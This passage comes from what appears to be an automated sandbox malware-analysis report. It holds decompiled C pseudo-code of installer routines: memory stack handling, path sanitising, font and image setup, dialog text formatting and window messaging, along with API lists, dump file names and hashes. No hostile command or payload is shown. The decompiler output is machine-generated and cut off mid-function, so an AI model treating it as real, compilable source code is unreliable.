				if(_t66 == 0) {
					L28:
					return GlobalFree(_t90);
				}
				do {
					_t29 = _t66;
					_t80 = _t80 + 1;
					_t94 = _t29 - 0x66;
					if(_t94 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L24:
							_t31 =  *0x73c35010;
							if( *0x73c35010 != 0) {
								E73C312FA( *0x73c35038, _t31 + 4, _t83);
								_t67 =  *0x73c35010;
								_t92 = _t92 + 0xc;
								 *0x73c35010 =  *_t67;
								GlobalFree(_t67);
							}
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L15:
							GlobalFree(E73C3157E(E73C314E2( *_t80 - 0x30)));
							_t80 = _t80 + 1;
							goto L26;
						}
						_t43 = _t36;
						if(_t43 == 0) {
							L13:
							GlobalFree(E73C315C7( *_t80 - 0x30, E73C3152B()));
							_t80 = _t80 + 1;
							L11:
							_t83 = _v0;
							goto L26;
						}
						L8:
						if(_t43 != 1) {
							goto L26;
						}
						_t88 = GlobalAlloc(0x40, _t83 + 4);
						_t11 = _t88 + 4; // 0x4
						E73C312FA(_t11,  *0x73c35038, _v0);
						 *_t88 =  *0x73c35010;
						 *0x73c35010 = _t88;
						L10:
						_t92 = _t92 + 0xc;
						goto L11;
					}
					if(_t94 == 0) {
						_t74 =  *0x73c3503c;
						_t85 =  *_t74;
						 *_t74 =  *_t85;
						_t75 = _v0;
						_t52 =  *((intOrPtr*)(_t75 + 0xc));
						_a12 = _t52;
						if( *((char*)(_t85 + 4)) == 0x1e) {
							E73C312FA(_t75, _t85 + 6, 0x38);
							_t75 = _v0;
							_t92 = _t92 + 0xc;
							_t52 = _a12;
						}
						 *((intOrPtr*)(_t75 + 0xc)) = _t52;
						GlobalFree(_t85);
						goto L11;
					}
					_t56 = _t29 - 0x46;
					if(_t56 == 0) {
						_t89 = GlobalAlloc(0x40,  *0x73c35040 + 8);
						 *((intOrPtr*)(_t89 + 4)) = 0x1e;
						_t14 = _t89 + 6; // 0x6
						E73C312FA(_t14, _v0, 0x38);
						 *_t89 =  *( *0x73c3503c);
						 *( *0x73c3503c) = _t89;
						goto L10;
					}
					_t62 = _t56 - 6;
					if(_t62 == 0) {
						goto L24;
					}
					_t63 = _t62 - 4;
					if(_t63 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L15;
					}
					_t43 = _t63;
					if(_t43 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L13;
					}
					goto L8;
					L26:
					_t66 =  *_t80;
				} while (_t66 != 0);
				_t90 = _a8;
				goto L28;
			}


























                                                            0x73c310cc
                                                            0x73c310d6
                                                            0x73c310e0
                                                            0x73c310f4
                                                            0x73c310f7
                                                            0x73c310fe
                                                            0x73c3110d
                                                            0x73c3110f
                                                            0x73c31113
                                                            0x73c31115
                                                            0x73c3111a
                                                            0x73c312a7
                                                            0x73c312ae
                                                            0x73c312ae
                                                            0x73c31124
                                                            0x73c31124
                                                            0x73c31127
                                                            0x73c31128
                                                            0x73c3112b
                                                            0x73c31250
                                                            0x73c31253
                                                            0x73c3126d
                                                            0x73c3126d
                                                            0x73c31274
                                                            0x73c31281
                                                            0x73c31286
                                                            0x73c3128c
                                                            0x73c31292
                                                            0x73c31297
                                                            0x73c31297
                                                            0x00000000
                                                            0x73c31274
                                                            0x73c31255
                                                            0x73c31258
                                                            0x73c311b8
                                                            0x73c311cd
                                                            0x73c311cf
                                                            0x00000000
                                                            0x73c311cf
                                                            0x73c3125f
                                                            0x73c31262
                                                            0x73c3119b
                                                            0x73c311b0
                                                            0x73c311b2
                                                            0x73c3118f
                                                            0x73c3118f
                                                            0x00000000
                                                            0x73c3118f
                                                            0x73c31154
                                                            0x73c31157
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3116d
                                                            0x73c31175
                                                            0x73c31179
                                                            0x73c31184
                                                            0x73c31186
                                                            0x73c3118c
                                                            0x73c3118c
                                                            0x00000000
                                                            0x73c3118c
                                                            0x73c31131
                                                            0x73c31213
                                                            0x73c31219
                                                            0x73c3121d
                                                            0x73c31223
                                                            0x73c31226
                                                            0x73c31229
                                                            0x73c3122d
                                                            0x73c31236
                                                            0x73c3123b
                                                            0x73c3123e
                                                            0x73c31241
                                                            0x73c31241
                                                            0x73c31246
                                                            0x73c31249
                                                            0x00000000
                                                            0x73c31249
                                                            0x73c31137
                                                            0x73c3113a
                                                            0x73c311e6
                                                            0x73c311ea
                                                            0x73c311f1
                                                            0x73c311f8
                                                            0x73c31205
                                                            0x73c3120c
                                                            0x00000000
                                                            0x73c3120c
                                                            0x73c31140
                                                            0x73c31143
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31149
                                                            0x73c3114c
                                                            0x73c311b5
                                                            0x00000000
                                                            0x73c311b5
                                                            0x73c3114f
                                                            0x73c31152
                                                            0x73c31198
                                                            0x00000000
                                                            0x73c31198
                                                            0x00000000
                                                            0x73c31299
                                                            0x73c31299
                                                            0x73c3129b
                                                            0x73c312a3
                                                            0x00000000

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C31163
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C311B0
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C311CD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C311E0
                                                            • GlobalFree.KERNEL32 ref: 73C31249
                                                            • GlobalFree.KERNEL32(?), ref: 73C31297
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C312A8
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 3ba90c4b64897eea29ba3bf8728cb25e59ed8251496d54bf935446d9dc7744b6
                                                            • Instruction ID: 046dca07569c50e2dea95e8f6693e051f026c8d48453250a6c9af6d3359f5689
                                                            • Opcode Fuzzy Hash: 3ba90c4b64897eea29ba3bf8728cb25e59ed8251496d54bf935446d9dc7744b6
                                                            • Instruction Fuzzy Hash: 98519FB65083819FD301EF6AC990BA57BF8FF4A204F554419E58ADB290D733E901CB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406535 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406535(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C56(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C14("*?|<>/\":", _t5))) == 0) {
							E00405DA5(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                            0x00406537
                                                            0x0040653f
                                                            0x00406553
                                                            0x00406553
                                                            0x00406559
                                                            0x00406566
                                                            0x00406566
                                                            0x00406567
                                                            0x00406569
                                                            0x0040656d
                                                            0x0040656f
                                                            0x00406578
                                                            0x0040657a
                                                            0x00406594
                                                            0x0040659c
                                                            0x0040659c
                                                            0x004065a1
                                                            0x004065a3
                                                            0x004065a5
                                                            0x004065a9
                                                            0x004065aa
                                                            0x004065ad
                                                            0x004065b5
                                                            0x004065b7
                                                            0x004065bb
                                                            0x00000000
                                                            0x00000000
                                                            0x004065c1
                                                            0x004065c6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004065c6
                                                            0x004065cb

                                                            APIs
                                                            • CharNextA.USER32(0000000B), ref: 0040658D
                                                            • CharNextA.USER32(0000000B), ref: 0040659A
                                                            • CharNextA.USER32(0000000B), ref: 0040659F
                                                            • CharPrevA.USER32(0000000B,0000000B), ref: 004065AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: *?|<>/":
                                                            • API String ID: 589700163-165019052
                                                            • Opcode ID: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                            • Instruction ID: f1a46c244338e9c327de57877a99ef2f1f2ce6c7380876dc27bda46ebf0462ee
                                                            • Opcode Fuzzy Hash: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                            • Instruction Fuzzy Hash: 671134918047903DFB3216386C04B776FC94F9B760F5A007BE4C2722CAC63C5CA6826D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402C17(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402C39(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x452420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061B5();
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                            0x00401d65
                                                            0x00401d69
                                                            0x00401d7e
                                                            0x00401d6b
                                                            0x00401d6d
                                                            0x00401d73
                                                            0x00401d73
                                                            0x00401d84
                                                            0x00401d87
                                                            0x00401d91
                                                            0x00401d94
                                                            0x00401d9c
                                                            0x00401dad
                                                            0x00401db0
                                                            0x00401dbb
                                                            0x00401db2
                                                            0x00401db4
                                                            0x00401db4
                                                            0x00401dbf
                                                            0x00401dcc
                                                            0x00401df3
                                                            0x00401e02
                                                            0x00401e10
                                                            0x00401e18
                                                            0x00401e20
                                                            0x00401e20
                                                            0x00401e29
                                                            0x00401e2f
                                                            0x00402a42
                                                            0x00402a42
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: a576bf6efa7c2fb23105444ffa85423c352b0735285158bf1a86dfd814425e5e
                                                            • Instruction ID: e108dfa7ff8bed4c569463ce295f5c853ec5e47b290a4dfb9769ed3a77c2d4ca
                                                            • Opcode Fuzzy Hash: a576bf6efa7c2fb23105444ffa85423c352b0735285158bf1a86dfd814425e5e
                                                            • Instruction Fuzzy Hash: 63213B72E00109AFDF15DFA4DD85AAEBBB5EB48300F24407EF901F62A1DB789941DB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401E35 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C17(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x414438->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x414448 = E00402C17(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x41444f = 1;
				 *0x41444c = _t15 & 0x00000001;
				 *0x41444d = _t15 & 0x00000002;
				 *0x41444e = _t15 & 0x00000004;
				E004062EA(_t9, _t31, _t33, 0x414454,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x414438);
				_push(_t18);
				_push(_t33);
				E004061B5();
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                            0x00401e35
                                                            0x00401e40
                                                            0x00401e42
                                                            0x00401e4f
                                                            0x00401e66
                                                            0x00401e6b
                                                            0x00401e78
                                                            0x00401e7d
                                                            0x00401e81
                                                            0x00401e8c
                                                            0x00401e93
                                                            0x00401ea5
                                                            0x00401eab
                                                            0x00401eb0
                                                            0x00401eba
                                                            0x00402628
                                                            0x00401569
                                                            0x00402a42
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401E38
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                            • MulDiv.KERNEL32 ref: 00401E5A
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                            • CreateFontIndirectA.GDI32(00414438), ref: 00401EBA
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID:
                                                            • API String ID: 3808545654-0
                                                            • Opcode ID: e89e6eedd1c15f4ce250c8d11fd485d8fe03999d8a0dbcf2c806e51525b441ac
                                                            • Instruction ID: 8ddd809678b75effdda657bd79c7971a8a008a3e86d82937076eaa48eaf57caa
                                                            • Opcode Fuzzy Hash: e89e6eedd1c15f4ce250c8d11fd485d8fe03999d8a0dbcf2c806e51525b441ac
                                                            • Instruction Fuzzy Hash: 8D01B571504240AFE7006BB0EE4ABDD7FF49B95319F14447DF281B71E2CA7804898B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404B1D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E00404B1D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062EA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062EA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062EA(_t41, _t47, 0x43c090, 0x43c090, _a8);
				wsprintfA(_t32 + lstrlenA(0x43c090), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x44e3f8, _a4, 0x43c090);
			}



















                                                            0x00404b23
                                                            0x00404b28
                                                            0x00404b30
                                                            0x00404b31
                                                            0x00404b3e
                                                            0x00404b46
                                                            0x00404b47
                                                            0x00404b49
                                                            0x00404b4b
                                                            0x00404b4d
                                                            0x00404b50
                                                            0x00404b50
                                                            0x00404b57
                                                            0x00404b5d
                                                            0x00404b5d
                                                            0x00404b64
                                                            0x00404b6b
                                                            0x00404b6e
                                                            0x00404b71
                                                            0x00404b71
                                                            0x00404b75
                                                            0x00404b85
                                                            0x00404b87
                                                            0x00404b8a
                                                            0x00404b33
                                                            0x00404b33
                                                            0x00404b3a
                                                            0x00404b3a
                                                            0x00404b92
                                                            0x00404b9d
                                                            0x00404bb3
                                                            0x00404bc3
                                                            0x00404bdf

                                                            APIs
                                                            • lstrlenA.KERNEL32(0043C090,0043C090,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                            • wsprintfA.USER32 ref: 00404BC3
                                                            • SetDlgItemTextA.USER32(?,0043C090), ref: 00404BD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s
                                                            • API String ID: 3540041739-3551169577
                                                            • Opcode ID: ef18dc2ada111650a354b4d1e8e6ccd4a0c7f7449d403410ef4590da8fa39622
                                                            • Instruction ID: 7c3cbaaa6cddaf4418f9485f50c6cec2219b2b57f28ad8e3923d4dc00c9a2874
                                                            • Opcode Fuzzy Hash: ef18dc2ada111650a354b4d1e8e6ccd4a0c7f7449d403410ef4590da8fa39622
                                                            • Instruction Fuzzy Hash: 7811E773A0412867DB00766D9C41FAF3298DB85374F25027BFA26F31D1E978DC1282A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C17(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402C17(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402C39(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C39(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C39();
					_t32 = E00402C39();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C17();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402C17(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061B5();
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                            0x00401c2e
                                                            0x00401c30
                                                            0x00401c37
                                                            0x00401c3a
                                                            0x00401c3d
                                                            0x00401c47
                                                            0x00401c4b
                                                            0x00401c4e
                                                            0x00401c57
                                                            0x00401c57
                                                            0x00401c5a
                                                            0x00401c5e
                                                            0x00401c67
                                                            0x00401c67
